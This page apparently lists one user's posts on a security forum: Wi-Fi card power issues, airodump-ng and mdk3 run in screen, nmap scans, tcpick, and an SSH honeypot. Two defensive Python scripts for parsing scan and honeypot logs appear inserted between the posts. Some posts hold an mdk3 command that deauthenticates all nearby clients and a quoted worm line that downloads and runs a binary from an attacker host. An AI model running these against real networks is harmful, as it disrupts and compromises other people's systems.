
i8igmac

Dedicated Members
  • Posts: 939
  • Joined
  • Last visited
  • Days Won: 22

Posts posted by i8igmac

  1. 56 minutes ago, digip said:

    I wonder if a lot of the issue with these on the Pi is proper power and connectivity for the USB cards. I see similar issues when using in a VM, even under VMware, that when on native hardware, they tend to work fine with no issue, but the same card might barf on vbox completely and work partly on VMware, even when configured with the correct USB settings in the host's BIOS and in the VM config.

    Indeed this is the issue most of the time. The Pi is capable of running small devices, but for sure Alfa cards need a separate power supply.

    The Alfa card may work for a short period, but all it takes is a large amount of data to pass through the card to trigger a malfunction of some kind.

    I have had an Alfa card working with a little hack like setting the packet size to the smallest size allowed, but of course this will bring your throughput to a sluggish crawl. This solution won't work in all situations or other tasks.

    	iwconfig wlan1 rate 1M

    This would allow the card to run longer or delay the unstable condition long enough to accomplish small tasks.

  2. You should test the card while watching the kernel logs.

    Run this:

    	tail -f /var/log/kern.log

    Then run your console commands that you find to have issues...

    By the way, these Alfa cards consume too much power; the Raspberry Pi does not supply enough voltage and you may see an 'over current' problem in the kern.log.

    You need a powered USB hub.

  3. 10 hours ago, b0N3z said:

    This setup you have is awesome. I followed that setup for my rpi3 and it worked great. But I'm still stuck on being able to disconnect from the pi and still keep kismet running and then be able to reconnect later to check on it or stop it.

    So my experience with screen is very little. I read through a couple of pages about it and got the tl;dr. Would this be something I can do from my android phone with an app like juicessh? I installed it on my pi and use it on osx to connect to the bashbunny via serial, but that's about it.

    I use it almost daily with JuiceSSH from my Android phone; after this intro I'm sure you will use it too. Just an example below.

    	kali@kali:~$ screen
    	(New session started with PID=4456)
    	kali@kali:~$ airodump-ng -w log-handshakes -i wlp3s0
    	(ctrl+a+d... disconnect from the console; it keeps running in the background. We can connect back to the console later.)
    	kali@kali:~$ screen
    	(Another session with PID=4457)
    	kali@kali:~$ mdk3 -I wlp1s0 -d
    	(ctrl+a+d... disconnect from the console and background the process.)
    	kali@kali:~$ exit
    	(Both sessions are still running)

    So, there are 2 console applications currently running. The first one is logging handshakes. The second session or daemon is deauthenticating all clients in range.

    I can connect back to these screen sessions at any time:

    	kali@kali:~$ screen -r 4456

    You could do the same with Kismet; I assume you are logging data just like I have done in the above example.

    I think you can also start Kismet from an rc.local startup script using screen, to allow you to connect back to the session.

  4. Maybe another year my wish will come true. Kali, Android, Atheros...

    I have installed Kali on a Droid Incredible with a VM, but it's not so useful in my opinion. Metasploit is unusable because of its size. I guess you could run ARP spoofing, but these days it is not so effective due to HSTS, and I already mentioned the Wi-Fi.

    Pray with me to the hardware gods for an Atheros Droid 8-core.

  5. I'm not so interested until an Android device works out of the box and has an Atheros chip.

    In the past, I have read that for Wi-Fi attacks from Android you need a USB Wi-Fi card that supports monitor mode and a powered USB hub. This would look super ugly hanging out of your back pocket.

  6. 16 minutes ago, Rainman_34 said:

    Is anything in the US really still vulnerable to reaver? Yes, but few and far between. Personally, if the router appears to be anything within the last 4 years, reaver becomes a last-ditch effort, and if it locks after just a few tries I don't even waste time trying more with reaver.

    Is this null PIN vulnerability working on US hardware?

    I agree. There are times it just worked. Most of the time the routers just lock up.

  7. 	nmap -sP 10.0.0.

    Simply ping.

    	nmap -sS -p 80 -oX scan.xml

    This will do a TCP SYN scan of only a single port and save it as an XML document. With a large list of hosts I then import this XML document into Metasploit, which allows me to perform a scan on all hosts that are online. With Metasploit you can do more nmap scanning and set your host list to all clients discovered in the XML, or only a select group that match a filter or string of your choice.
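The import step in the post (scan once with `-oX`, then pick the online hosts or a filtered subset for follow-up) can be reproduced without Metasploit by reading the XML directly. The following is an added example, not code from the post or from nmap; the XML document is a constructed sample in nmap's `-oX` layout (`nmaprun/host/status/address/ports/port/state`), and the addresses and hostnames in it are made up:

```python
import xml.etree.ElementTree as ET

# Constructed sample of what `nmap -sS -p 80 -oX scan.xml 10.0.0.0/24` writes.
# Addresses and hostnames are made up for this example; it is not a real scan.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -p 80 -oX scan.xml 10.0.0.0/24">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="10.0.0.1" addrtype="ipv4"/>
    <hostnames><hostname name="gateway.lan" type="PTR"/></hostnames>
    <ports><port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http"/></port></ports>
  </host>
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="10.0.0.7" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="80"><state state="closed" reason="reset"/></port></ports>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="10.0.0.9" addrtype="ipv4"/>
  </host>
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="10.0.0.12" addrtype="ipv4"/>
    <hostnames><hostname name="printer.lan" type="PTR"/></hostnames>
    <ports><port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http"/></port></ports>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Turn an nmap -oX document into a list of dicts, one per scanned host."""
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.findall("host"):
        status = host.find("status")
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:  # skip entries without an IPv4 address
            continue
        hostname = host.find("hostnames/hostname")
        open_ports = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is not None and state.get("state") == "open":
                open_ports.append(int(port.get("portid")))
        hosts.append({
            "ip": addr.get("addr"),
            "up": status is not None and status.get("state") == "up",
            "hostname": hostname.get("name") if hostname is not None else "",
            "open_ports": sorted(open_ports),
        })
    return hosts


def live_hosts(hosts):
    """IPs that answered the scan at all (the 'online' list the post talks about)."""
    return [h["ip"] for h in hosts if h["up"]]


def hosts_with_open_port(hosts, port):
    """IPs that have the given TCP port open, e.g. port 80 for the scan above."""
    return [h["ip"] for h in hosts if port in h["open_ports"]]


def filter_hosts(hosts, needle):
    """Select a subset by substring match on IP or hostname, like the
    string filter the post applies before re-scanning a group."""
    needle = needle.lower()
    return [h["ip"] for h in hosts
            if needle in h["ip"] or needle in h["hostname"].lower()]


if __name__ == "__main__":
    parsed = parse_nmap_xml(SAMPLE_NMAP_XML)
    print("up:", live_hosts(parsed))
    print("port 80 open:", hosts_with_open_port(parsed, 80))
    print("matching 'lan':", filter_hosts(parsed, "lan"))
```

Point the script at a real `scan.xml` by replacing the sample string with the file's contents; the host list it produces is the same inventory Metasploit builds from the import, and it is a convenient place to compare one day's scan against the last one when checking what is new on the network.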

  8. 13 hours ago, Dave-ee Jones said:

    Actually the latest release is 2.000.052, which I had upgraded to previously but had issues with it so dropped back to 2.000.024, which allows me to use telnet and not have an overly buggy interface (both are buggy anyway..).

    Here is what I would try... avoid the VM... make a Kali USB or CD. Boot up, and I believe Kali has a tftpd service in the Kali menu.

    I would also do what was suggested in the previous post: if possible, can you upgrade to version 040? If not, then I'm sure the latest up-to-date version should suffice.

    In Kali you should be prepared to monitor the traffic when you attempt the flash. Use Wireshark.

    When trying to diagnose a network issue you should first look at the stream.

    If you're in control of the traffic, you're in control.

  9. 7 hours ago, Dave-ee Jones said:

    Yes, that's where I got the TFTP stuff from. Did you read any of it? Lol.

    Have you used TFTP before? I can walk you through this process; if you would like, I'll post the contents of the manual.

    I'll assume you're a Windows user. I can't help you here; it's been ten years since I ran Windows.

    In the article I read, he specifically said he used a Linux TFTP server and successfully flashed 7 identical devices.

    If you would like, I could show you how to use a Linux operating system.

  10. 1 hour ago, Spoonish said:

    Wireshark?

    I do most of everything from a command line... since my router runs Ubuntu, there is no shortage of tools.

    tcpick is a command line tool that uses the same filtering as Wireshark.

    	tcpick -i wlp3s0 -C

    This simply shows each TCP connection made as it happens. Then I ran the command below to see port 22 traffic with binary data.

    	tcpick -i wlp3s0 -yP -C 'dst port 22'

    I wish I had recorded the whole process.

  11. 11 minutes ago, Dave-ee Jones said:

    Yeah, well, you won't mind if we say "we told you so" if your whole network gets crypto'd or all your data is deleted or sent online then, will you? :P

    Not worried. If you would like a shot, just ask. My router is a beast custom build. I'll make this pot a permanent setup.

  12. 57 minutes ago, Dave-ee Jones said:

    So you used their hack to hack your own devices to gain better control of your own devices?

    That's when you know you were never in control of your own devices.. Sad boi.

    No. That was my mistake with the iptables rules. When I attempted to log into the attacker's SSH, my iptables rules would also forward me back to the VM... oops...

    None of my devices were hacked. I set up a honeypot and gave direct access in hopes of finding some private exploits.

  13. Today I noticed my network was a little sluggish, so I checked the TCP stream out of habit. I see login attempts on my home router via SSH.

    So I quickly installed a light version of Ubuntu in VirtualBox and then installed a honeypot. I created a user list of root:x:500-worst-passwords for SSH.

    With some iptables kung fu I directed the attack to the honeypot, and boom, I see command execution while it's happening ;-)

    This is exciting...

    The attack was coming from hundreds of IoT devices (webcams/routers/household appliances).

    When I saw the commands executed, I see:

    	wget http://Attack-ip-address/y808oe; chmod +x y808oe; ./y808oe

    So I downloaded a copy of the file for later research in hopes that it might be 0day...

    One of my thoughts is the list of IoT devices used; I too could gain access to these devices.

    I believe this is just an IoT device worm automated to get more devices.

    Anyone have experience or fun with honeypots?

    • Upvote 1
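The two things worth keeping from a session like the one described in the post are the brute-force pressure per source address and the download-then-execute chain with its payload URL, which is the indicator you hash and file for later. The script below is an added example, not the poster's setup or any honeypot's own code; the session log format is invented for the example, and the addresses in it are RFC 5737 documentation ranges rather than real attacker IPs. The `y808oe` filename is the one the post reports.

```python
import hashlib
import re
from collections import Counter
from urllib.parse import urlparse

# Constructed honeypot session log (format made up for this example). Source and
# payload addresses are RFC 5737 documentation ranges, not real attacker IPs.
SAMPLE_SESSION_LOG = """\
2017-10-03 21:14:02 203.0.113.5 login root/admin FAILED
2017-10-03 21:14:03 203.0.113.5 login root/123456 FAILED
2017-10-03 21:14:04 203.0.113.5 login root/password OK
2017-10-03 21:14:05 203.0.113.5 cmd: cd /tmp; wget http://198.51.100.23/y808oe; chmod +x y808oe; ./y808oe
2017-10-03 21:14:06 203.0.113.5 cmd: rm -f y808oe
2017-10-03 21:15:40 198.51.100.77 login root/root FAILED
2017-10-03 21:15:41 198.51.100.77 cmd: uname -a
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<src>\S+) "
    r"(?:login (?P<user>[^/\s]+)/(?P<pw>\S+) (?P<result>OK|FAILED)|cmd: (?P<cmd>.*))$"
)
URL_RE = re.compile(r"https?://[^\s;|&'\"]+")


def parse_session_log(text):
    """One dict per log line: {'ts', 'src', 'kind': 'login'|'cmd', ...}."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines that do not follow the expected format
        rec = {"ts": m.group("ts"), "src": m.group("src")}
        if m.group("cmd") is not None:
            rec.update(kind="cmd", cmd=m.group("cmd"))
        else:
            rec.update(kind="login", user=m.group("user"),
                       pw=m.group("pw"), ok=m.group("result") == "OK")
        records.append(rec)
    return records


def failed_logins_per_source(records):
    """Brute-force pressure per source IP: the count of failed SSH logins."""
    return Counter(r["src"] for r in records if r["kind"] == "login" and not r["ok"])


def _basename(path):
    return path.rsplit("/", 1)[-1]


def analyse_command(cmd):
    """Spot the download / chmod +x / execute chain the post describes."""
    segments = [s.strip() for s in re.split(r";|&&|\|\||\|", cmd) if s.strip()]
    urls = URL_RE.findall(cmd)
    fetched = {_basename(urlparse(u).path) for u in urls}
    chmodded, executed = set(), set()
    for seg in segments:
        m = re.match(r"chmod\s+\+x\s+(\S+)", seg)
        if m:
            chmodded.add(_basename(m.group(1)))
        m = re.match(r"(?:\./|sh\s+|bash\s+)(\S+)", seg)
        if m:
            executed.add(_basename(m.group(1)))
    return {
        "urls": urls,
        "fetched": sorted(fetched),
        "made_executable": sorted(chmodded),
        "executed": sorted(executed),
        # a file that was both downloaded and run in the same command line
        "fetch_and_run": bool(fetched & executed),
    }


def extract_dropper_urls(records):
    """(source IP, URL, filename) IOC triples for every download seen in a session."""
    iocs = []
    for r in records:
        if r["kind"] != "cmd":
            continue
        for url in analyse_command(r["cmd"])["urls"]:
            iocs.append((r["src"], url, _basename(urlparse(url).path)))
    return iocs


def sample_fingerprint(data):
    """SHA-256 of a captured payload, the identifier to keep with the IOC record."""
    return hashlib.sha256(data).hexdigest()


if __name__ == "__main__":
    recs = parse_session_log(SAMPLE_SESSION_LOG)
    print(failed_logins_per_source(recs))
    print(extract_dropper_urls(recs))
    for r in recs:
        if r["kind"] == "cmd" and analyse_command(r["cmd"])["fetch_and_run"]:
            print("fetch-and-run from", r["src"], ":", r["cmd"])
```

Feed it the command log your honeypot writes after adjusting `LINE_RE` to that format; the URL and SHA-256 pair is what to share or block, and the per-source counter is the quickest way to see which of the hundreds of infected devices the post mentions are doing the hammering.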